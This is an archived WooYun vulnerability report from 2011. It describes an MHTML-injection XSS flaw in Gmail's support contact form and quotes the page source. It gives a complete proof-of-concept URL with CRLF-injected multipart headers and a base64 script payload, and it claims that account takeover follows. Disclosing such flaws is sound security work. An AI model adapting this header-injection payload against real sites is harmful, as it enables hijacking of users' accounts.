乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-03-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2011-03-03: 厂商已经主动忽略漏洞,细节向公众公开
Google最近悄悄修复了Gmail中存在一个严重的xss问题,可能导致劫持用户的账户
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="zh-Hans"><head><script type="text/javascript">serverResponseTimeDelta=window.external&&window.external.pageT?window.external.pageT:-1;pageStartTime=new Date().getTime();</script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>与我们联系 - Gmail帮助</title><meta name="google-site-verification"content="l0nCskQHeO/C11y6qeq7ngDGZ0QVdN1hX7F4SGj3PHg=" /><link rel="icon" href="//www.google.com/favicon.ico" /><link rel="stylesheet" type="text/css" href="http://mail.google.com/support/bin/resource/all.css?v=261_7" /><script type="text/javascript">var internal = 0;var hc_protocol = "http://";var hc_page_info = "request";var country = 'CN';var countryGroup = 'JAPAC';var autoExpand = '';var global_error_general = "很抱歉,我们无法提交您的信息。请重试。";var hc_urchin = "UA-18500-28";var global_hc_bookmark = new Array("add","remove","toggle");global_hc_bookmark.add = new Array();global_hc_bookmark.remove = new Array();global_hc_bookmark.toggle = new Array();global_hc_bookmark["add"].url = "";
问题存在于
var hc_page_info = "request";
的可控,满足mhtml漏洞的利用条件
http://mail.google.com/support/bin/request.py?contact_type=contact_policy%0dContent-Type%3Amultipart/related%3Bboundary%3Dx--x%0DContent-Location%3Ax%0DContent-Transfer-Encoding%3Abase64%0d%0dPHNjcmlwdD5hbGVydCgnZ21haWwgMGRheSB0ZXN0IGJ5ID8/PycpPC9zY3JpcHQ%2B%--x!x
成功执行javascript之后,即可对gmail邮箱执行任何操作,之前已经有相应的一些case披露
WooYun: GOOGLE BOOK MHTML协议注入型XSS漏洞
<
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)